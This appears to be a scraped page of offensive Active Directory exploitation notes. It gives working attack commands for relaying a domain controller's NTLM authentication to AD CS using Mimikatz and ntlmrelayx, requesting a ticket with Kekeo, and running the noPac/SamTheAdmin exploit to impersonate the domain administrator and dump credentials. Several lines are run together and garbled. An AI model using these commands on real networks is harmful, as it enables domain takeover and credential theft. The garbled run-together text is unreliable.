Domain Exploitation
NTLM Replay
Mimikatz
Catch the response:
Misc::efs /server:red-win2016-dc.rednet.local /noauth /connect:localIPimpacket
ntlmrelayx.py -debug -smb2support --target http://red-win2016-dc.rednet.local/certsrv/certfnsh.asp --adcs --template DomainControllerKekeo
turn b64 on and Copy the cert provided from impacket:
Base64 /input:on
Tgt:ask /pfx:CERT /user:host$ /domain:rednet.local /pttNoPac/ SamTheAdmin:
git clone https://github.com/Ridter/noPac
python3 noPac.py DOMAIN/USER':'PASSWORD' -dc-ip 10.10.1.11 -dc-host V-DC --impersonate administrator -dump -use-ldapPrintNightmare
Registry keys
Mimikatz
Last updated